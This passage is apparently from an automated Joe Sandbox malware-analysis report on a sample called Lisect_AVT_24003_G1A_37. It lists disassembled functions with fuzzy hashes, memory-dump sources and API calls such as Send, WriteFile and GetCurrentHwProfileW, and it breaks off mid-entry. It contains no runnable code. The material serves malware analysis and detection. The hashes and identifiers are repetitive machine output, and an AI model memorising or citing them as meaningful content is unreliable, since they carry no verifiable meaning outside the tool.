Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Send
String ID: 131$50500$Ws2_32.dll$\;:$t;:$ta:$;:
API String ID: 121738739-1419621233
Opcode ID: cc9e624841466240fb2ebf3310c15c702087db44e20e56563fb4f8281159fcdc
Instruction ID: 41fa0ada1bc89aaf801854749deb7e91d32252c7f3f14f23856b734b0144baa8
Opcode Fuzzy Hash: cc9e624841466240fb2ebf3310c15c702087db44e20e56563fb4f8281159fcdc
Instruction Fuzzy Hash: E5D1EF30E14249DFDF14DFA8CC54BADBBF5AF06300F694258D855AB1D2E7B09886CB91

Function 04E809E5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZXaPPR, xrefs: 04E80A4F

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID: ZXaPPR
API String ID: 0-2639708229
Opcode ID: d6dc3a519db5f068f535c06063691a7fa742dfb683dfe83ecea775e400c82482
Instruction ID: 5563f7a7590bce13d9da9b3f96f4e5526179bdffe24439e4f314cb1de79b6b0c
Opcode Fuzzy Hash: d6dc3a519db5f068f535c06063691a7fa742dfb683dfe83ecea775e400c82482
Instruction Fuzzy Hash: 255114FB30C210ADFE02A6516B50AFB676DE7D6730732A4AEF40FD6142F2946A4D6131

Function 04E80A5D Relevance: 1.8, APIs: 1, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d469bd8fa5aecdf93529749aef287eb3048c0ec8f9e75e9e6f7ef859f17d4e2
Instruction ID: b922617ee27f1c75e53beb581a180503352104968b1f0b4f6f78bb0fbafe19d8
Opcode Fuzzy Hash: 4d469bd8fa5aecdf93529749aef287eb3048c0ec8f9e75e9e6f7ef859f17d4e2
Instruction Fuzzy Hash: 5D51F3FB30D214BDFA02A5416B50AF7676DE7E6330732A46EF40FD6142F2A46A4D6131

Function 04E80A86 Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9d4d1ee3eabeeb8e03e3bc510ea276e5938d887878e83d517ca50a91f8732f1
Instruction ID: 04b30dfef85f55428e11062d47729f01022a4af4375846c1846269d704003139
Opcode Fuzzy Hash: c9d4d1ee3eabeeb8e03e3bc510ea276e5938d887878e83d517ca50a91f8732f1
Instruction Fuzzy Hash: F651E1EB30D110BDFE52A5416B50AFB67ADE7E6330732A46EF40FC6542F2946A8D6031

Function 04E80ACD Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24228695799b830c4abd1083bf79d0f9837f3e6c9033b7fb788e72b51d393558
Instruction ID: 5d19a5bc67b131e1ae1e00d22d4aaefae9dbc14ff2817843d8e537906a0d97c6
Opcode Fuzzy Hash: 24228695799b830c4abd1083bf79d0f9837f3e6c9033b7fb788e72b51d393558
Instruction Fuzzy Hash: 5751CFEB30D211ADFE42A5416B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

Function 04E80A89 Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f538dd352969ea41f6be65bf1ffdd2b009fd8b2c2d22299524557fa114c60cbb
Instruction ID: 5ec6abc7dcb9615784915db6c20b6857fddce54723f9d936ace777636ddf30aa
Opcode Fuzzy Hash: f538dd352969ea41f6be65bf1ffdd2b009fd8b2c2d22299524557fa114c60cbb
Instruction Fuzzy Hash: 5B51EEEB30C110BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

Function 04E80A94 Relevance: 1.8, APIs: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 91f2bc62835c3c3e90fb82e2ab25b96fdd9a27262f965cb58780bad15ef622c1
Instruction ID: d91555482dab3c2dd8708c2746b228bf4b47fb6baa5ade84bc63dbb54198fee3
Opcode Fuzzy Hash: 91f2bc62835c3c3e90fb82e2ab25b96fdd9a27262f965cb58780bad15ef622c1
Instruction Fuzzy Hash: CD51CEEB30D111BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A8D6031

Function 04E80AA8 Relevance: 1.7, APIs: 1, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f4bb9a35f2695678a46cbeb72decc7e1ac4f359daf3109a94c1d828d0ed4df4c
Instruction ID: b8f2bd331a96789c4c871a97f332738ab7875293ab242fea506e416f4b3c4513
Opcode Fuzzy Hash: f4bb9a35f2695678a46cbeb72decc7e1ac4f359daf3109a94c1d828d0ed4df4c
Instruction Fuzzy Hash: 1051EFEB30D110BDFE42A5416B50AFB676DE7E6330732A46EF40FC2142F2946A8D6031

Function 04E80ADF Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3deeb88ff76392bf109e07df3f1675d79aa948fd890b51727f1c8abccc9b294
Instruction ID: b3d9ead78411a0c351faece3aaefb0f898f8a956c7f4e3b0ad20e6e1866e1adb
Opcode Fuzzy Hash: b3deeb88ff76392bf109e07df3f1675d79aa948fd890b51727f1c8abccc9b294
Instruction Fuzzy Hash: 194101EB30C115BDFE42A5816B50AFB676DE7E6330732A46EF40FC6142F2946A4D6031

Function 04E80AFB Relevance: 1.7, APIs: 1, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 17e31a307c568e3af303397703088aeef36c69b35f3d0a1e6427b228c4b41258
Instruction ID: b8a8db25d009ecb5894a39e8a671c2f96dbec9d0eee052dbe4bfea72c8eafefc
Opcode Fuzzy Hash: 17e31a307c568e3af303397703088aeef36c69b35f3d0a1e6427b228c4b41258
Instruction Fuzzy Hash: FC4122EB30D214BDFE02A5816B50AFB676DE7E6330732A46EF40FD2542F2946A4D6031

Function 04E80B11 Relevance: 1.7, APIs: 1, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c03a8bab2bab0019d4c6c1fda598e3cd47fab7c65242e6a43f59a69d8ca3a7
Instruction ID: d1f20d94d11033579aa83b053a73d1458a9d0749481c63ec34b13192b8606c1b
Opcode Fuzzy Hash: 62c03a8bab2bab0019d4c6c1fda598e3cd47fab7c65242e6a43f59a69d8ca3a7
Instruction Fuzzy Hash: 4541EFEB30C215ADFE52A5816B50AFB676DE7E6330732A46EF40FC2142F6946A4D6031

Function 04E80BC4 Relevance: 1.7, APIs: 1, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b2bb2bd9e5ec2f50d63218c09522f73a5e9345d9ed24075e0fa3dad8cb9b6cf
Instruction ID: dd84e93d361b19f7f40de92ce6fd3c3a0bce40ce72861141f270f852d53668ff
Opcode Fuzzy Hash: 0b2bb2bd9e5ec2f50d63218c09522f73a5e9345d9ed24075e0fa3dad8cb9b6cf
Instruction Fuzzy Hash: DD4105FB30D210ADFE42A5516B50AFB676DE7E6330732A46EF40FD6142F2946A4D6031

Function 04E80B62 Relevance: 1.7, APIs: 1, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e61a8fb57b02973c8383cb55e191608a4b6e221a5c9bdfc033363097effdcc57
Instruction ID: 4313fa931d5a0dd3db05098a8ca848e62d8d766552be7255faa9e46430c49425
Opcode Fuzzy Hash: e61a8fb57b02973c8383cb55e191608a4b6e221a5c9bdfc033363097effdcc57
Instruction Fuzzy Hash: B94137EB30C210BDFE02A5816B50AFB672DE7E6330732A46EF40FD2142F2942A4D6031

Function 04E80B4A Relevance: 1.7, APIs: 1, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f8ffc0d01df87c05053a09c051e4eef1f40d1024d2e19c59e83dd2e349325f12
Instruction ID: a02834cf323cd3c5e279f5af99ef288eb028dabacdb4040410ad3e6f2d68b9d7
Opcode Fuzzy Hash: f8ffc0d01df87c05053a09c051e4eef1f40d1024d2e19c59e83dd2e349325f12
Instruction Fuzzy Hash: 4641F0EB30D115BDFE42A5416B50AFB676DE7E6330732A46EF40FC2142F6946A8D6031

Function 00362F0C Relevance: 1.7, APIs: 1, Instructions: 198fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00356AF7,?,00000000,00000000,00000000,?,00000000,?,0034C023,00356AF7,00000000,0034C023,?,?), ref: 00363091

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4746bff130cfbbae3c66904ed759f7d8c567f7965749060fb01513d808d14b0f
Instruction ID: d8b00a1656c305182d0de795ba8014fe83f0a16d020abae17b963796dcad6141
Opcode Fuzzy Hash: 4746bff130cfbbae3c66904ed759f7d8c567f7965749060fb01513d808d14b0f
Instruction Fuzzy Hash: A861D571D04109AFDF12DFA8C844EEFBFB9AF15304F168145E905AB21AC772DA15CB60

Function 04E80B44 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 3ac0d79d5545de5b939778e84046ce096787b12fb88039b81c7772ce8b10cf95
Instruction ID: d8b2f5a72d8489895000d830ea2f28ede4cf33fdd7ef1474b40b753af8074527
Opcode Fuzzy Hash: 3ac0d79d5545de5b939778e84046ce096787b12fb88039b81c7772ce8b10cf95
Instruction Fuzzy Hash: 1241DEEB30D115ADFE42A5416B50AFB636DE7E6330732A46EF80FD2142F6946A8D6031

Function 04E80BDD Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d655eb280390bd77e4cc2e59f329ecf313583754d659d2a06974275c18ec00fb
Instruction ID: 326dabbc114dc4ad3b60e5444a8f6620f4e0d2043c7747e7f30be4740f1d1cd3
Opcode Fuzzy Hash: d655eb280390bd77e4cc2e59f329ecf313583754d659d2a06974275c18ec00fb
Instruction Fuzzy Hash: 7D4123EB30C214BDFE42A5416B50AF7676DE7E6330732A46EF80FC2142F6906A8D6031

Function 04E80BA6 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c712b8e0a208b964b087693c0c3e00582574632c7a56c5d71796d21519727f65
Instruction ID: 0da3a5123357a2ee38b4f14995c1e234a5368499f334836a1603adbbf025c27c
Opcode Fuzzy Hash: c712b8e0a208b964b087693c0c3e00582574632c7a56c5d71796d21519727f65
Instruction Fuzzy Hash: 1341D2EB30D115BDFE42A5416B50AF7636DE7E6330732A46EF40FD2141F6946A4D6031

Function 04E80BB1 Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: a38a74ac1f8b697c257f2d459189e54efaa0a6b8656df336f9f72a22d1bbdfd3
Instruction ID: 96019f544e3b87f522269904c43d9861f38377a05eaa7e805c0d5788f6bc5548
Opcode Fuzzy Hash: a38a74ac1f8b697c257f2d459189e54efaa0a6b8656df336f9f72a22d1bbdfd3
Instruction Fuzzy Hash: E94103EB30D115BDFE42A5412B50AFB676DE7E6330732A46EF40FC6142F6946A8D6031

Function 04E80C0C Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1fd5befecc9873deae063b46ef591a22026c1ac905798b7c3393898a82a80751
Instruction ID: f5be663653468723dba52a7249b46aed5d3fb8c3da027c1411b8ebe944f8c797
Opcode Fuzzy Hash: 1fd5befecc9873deae063b46ef591a22026c1ac905798b7c3393898a82a80751
Instruction Fuzzy Hash: 8531E2EB30C114ADFE52A5416B50AF7676DEBE6330732A4AEF40FC5142F6947A8D6031

Function 04E80C55 Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: eed2d2573df754d9c96716ebbab408848ed3adf8f7f866204c0981401a9eb5f5
Instruction ID: fc3e288558dc3d409c9cd847ca1a80b70ea68e655516a7789c59a0f49244dd3a
Opcode Fuzzy Hash: eed2d2573df754d9c96716ebbab408848ed3adf8f7f866204c0981401a9eb5f5
Instruction Fuzzy Hash: AE318DEB20C110BDFE52A5416B50AFB676DE7E6330732A46EF80FD6242F6946A4D6031

Function 04E80CF0 Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: ec03e525cb2c386a530442229756d539e5206b0ddac395833df832ff398b33a3
Instruction ID: 0a7d6fbf0e2de17db3f27aa201f45efea8f3120c6861160331f08ae57ee62fd1
Opcode Fuzzy Hash: ec03e525cb2c386a530442229756d539e5206b0ddac395833df832ff398b33a3
Instruction Fuzzy Hash: 8F3107EB30C110AEFE42A9415B54AFB676DEBD6230732946EF40FD6142F2917A4D6031

Function 04E80C82 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1837954b3aa31f61bad8475ea9f4e7d33fe7b66c256fe5827a026c6de0b3b528
Instruction ID: c92d27e612231e029026d7304b3cf14c235abb7919326a22838ffe2361d2c38b
Opcode Fuzzy Hash: 1837954b3aa31f61bad8475ea9f4e7d33fe7b66c256fe5827a026c6de0b3b528
Instruction Fuzzy Hash: 9C21C3EB30C110BDFE52A5416B50AFB676DE7D6330732A46EF40FD5242F6946A4D6031

Function 04E80C72 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 63baaad4e462952d988967f1ed454aded1a78f65be914755c22439ae098d3bb1
Instruction ID: 35a5fa36770a7635ca8fcec3376c39fcda1f2cb8711e079dfc78097b92d214b1
Opcode Fuzzy Hash: 63baaad4e462952d988967f1ed454aded1a78f65be914755c22439ae098d3bb1
Instruction Fuzzy Hash: 0D31C0EB20C110BDFE42A5416B50AFB672DEBE6330732A46EF40FD6242F6947A4D6131

Function 002DBA20 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002DBB71

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: 3493bc3347d194530a5e1f52ceb4cbc310de0ae6c0df0bc55d645c7f2f9314ae
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: D741F172910109DBCB16DF68D881AAEBBA5EF45340F26026AFC05EB345D730EE2187A1

Function 04E80C95 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 142f56a2baf739bb7966bf19860a49247991136479f42b22f720acae59ade334
Instruction ID: 2bdb3d69c7b103b1bd52bab450777b0aa78bd7593b62249912ad2a7c934353ff
Opcode Fuzzy Hash: 142f56a2baf739bb7966bf19860a49247991136479f42b22f720acae59ade334
Instruction Fuzzy Hash: E12106E730C210AEFE42A5415B50AF7676DEBD6330732946EF40FC6282F6A43A4D6031

Function 04E80CB7 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04E80CCD

Memory Dump Source

Source File: 00000000.00000002.3930888868.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_Lisect_AVT_24003_G1A_37.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 90c5c7957c54a8372f2358a6140c8b46ffcac9bc9acbd53aee2a26f3206bbdd1
Instruction ID: 2256324f7b2baec8b9d49b84b0de687155df6e655a10108d76f274696b3d7333
Opcode Fuzzy Hash: 90c5c7957c54a8372f2358a6140c8b46ffcac9bc9acbd53aee2a26f3206bbdd1
Instruction Fuzzy Hash: 762107E730C210AEEE42A5405B506F76769EBD6230732946EF40FD6242F6A47A4DA131

Function 00362582 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00362469,00000000,CF830579,003A1148,0000000C,00362525,0035662D,?), ref: 003625D8

Memory Dump Source

Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true

Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 286ab73df8b5ece42236ad873bcc58558cff6160abf5d4f60e62bf1857fa6543
Instruction ID: eda741e0289af506d018ac91f80bf5ceab5361ed67f1980d2bf6a0b6065c70fc
Opcode Fuzzy Hash: 286ab73df8b5ece42236ad873bcc58558cff6160abf5d4f60e62bf1857fa6543
Instruction Fuzzy Hash: 1C116B3370095016D63363745C55B7FA7598B87734F278309FA0A8F1CADE619C814266

Function 0035BACC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,003A0E00,0034C023,00000002,0034C023,00000000,?,?,?,0035BBD6,00000000,?,0034C023,00000002,003A0E00), ref: 0035BB08

Memory Dump Source

